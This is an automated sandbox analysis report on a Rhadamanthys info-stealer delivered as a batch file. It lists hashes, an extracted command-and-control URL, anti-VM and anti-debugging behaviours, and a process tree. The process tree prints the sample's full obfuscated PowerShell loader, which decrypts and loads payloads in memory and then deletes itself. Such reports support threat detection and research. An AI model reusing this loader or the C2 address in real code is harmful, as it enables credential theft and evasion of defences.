Analysis

  • max time kernel
    52s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/04/2023, 16:07

General

  • Target

    10FpDvByrqvHWUgFegBMjMmEkh.bat

  • Size

    189KB

  • MD5

    98b57df374d3888660dca7b8707aa9e5

  • SHA1

    4afb4626817228104bd752ba38650cef356e9afc

  • SHA256

    23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1

  • SHA512

    a21e4b1af9ddc7731356109bc1f2f75615db963e34666216c46e7b14bf28ac7f7c8432c060a2b67335111cf434cefa90de0e79e9b7c54a996c38d1fc79f26931

  • SSDEEP

    3072:jJ6sy+qsWPFiC5x1ElXP6RxLVYJdq7GOngOIxKtQPula2Mjr/L7pcTDlXMW5aOcT:hYs21xCIjLquDlIx91n/LCTDlXXHW

Malware Config

Extracted

Family

rhadamanthys

C2

http://185.224.129.51:8080/modlib/o6u3ke.661c

Signatures

  • Detect rhadamanthys stealer shellcode 3 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3664
    • C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;
      2⤵
      • Enumerates VirtualBox registry keys
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VirtualBox Guest Additions in registry
      • Looks for VMWare Tools registry key
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Checks system information in the registry
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952

Network

        MITRE ATT&CK Enterprise v6

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          64B

          MD5

          3ca1082427d7b2cd417d7c0b7fd95e4e

          SHA1

          b0482ff5b58ffff4f5242d77330b064190f269d3

          SHA256

          31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

          SHA512

          bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          15KB

          MD5

          14f535a89ae7a7ad8adc7ca3517bf190

          SHA1

          9577803b11d41263e25d054b57f3a681d0ed55ef

          SHA256

          14e0ee5b3045a935c30813215a6a8faaad1bb86e3305a50e4ae6d05ba49469ce

          SHA512

          72f9c9823262d72377063e5058067b1b8bdf5c541732ea9ded243407e45201c08152f7c7bac0f2359a0e1c95e38b7e383efac9499cd14dd49db3ccf2c1648f67

        • C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe

          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2qamug0.d3r.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/452-172-0x0000000000400000-0x0000000000432000-memory.dmp

          Filesize

          200KB

        • memory/452-188-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-154-0x0000000005700000-0x0000000005766000-memory.dmp

          Filesize

          408KB

        • memory/452-155-0x0000000005770000-0x00000000057D6000-memory.dmp

          Filesize

          408KB

        • memory/452-152-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-166-0x0000000006620000-0x000000000663E000-memory.dmp

          Filesize

          120KB

        • memory/452-167-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-168-0x0000000008E80000-0x00000000094FA000-memory.dmp

          Filesize

          6.5MB

        • memory/452-169-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

          Filesize

          104KB

        • memory/452-151-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-149-0x0000000002D00000-0x0000000002D36000-memory.dmp

          Filesize

          216KB

        • memory/452-150-0x0000000005820000-0x0000000005E48000-memory.dmp

          Filesize

          6.2MB

        • memory/452-198-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/452-186-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-187-0x0000000002D80000-0x0000000002D90000-memory.dmp

          Filesize

          64KB

        • memory/452-153-0x0000000005640000-0x0000000005662000-memory.dmp

          Filesize

          136KB

        • memory/452-197-0x0000000006AE0000-0x0000000006AE3000-memory.dmp

          Filesize

          12KB

        • memory/452-196-0x0000000006AE0000-0x0000000006AE2000-memory.dmp

          Filesize

          8KB

        • memory/452-193-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/452-195-0x0000000006AC0000-0x0000000006ADC000-memory.dmp

          Filesize

          112KB

        • memory/952-191-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-190-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-184-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-185-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/952-202-0x0000000006640000-0x00000000066D6000-memory.dmp

          Filesize

          600KB

        • memory/952-203-0x00000000065D0000-0x00000000065F2000-memory.dmp

          Filesize

          136KB

        • memory/952-204-0x00000000078A0000-0x0000000007E44000-memory.dmp

          Filesize

          5.6MB

        • memory/952-205-0x00000000027A0000-0x00000000027B0000-memory.dmp

          Filesize

          64KB

        • memory/3664-133-0x000001DB290F0000-0x000001DB29112000-memory.dmp

          Filesize

          136KB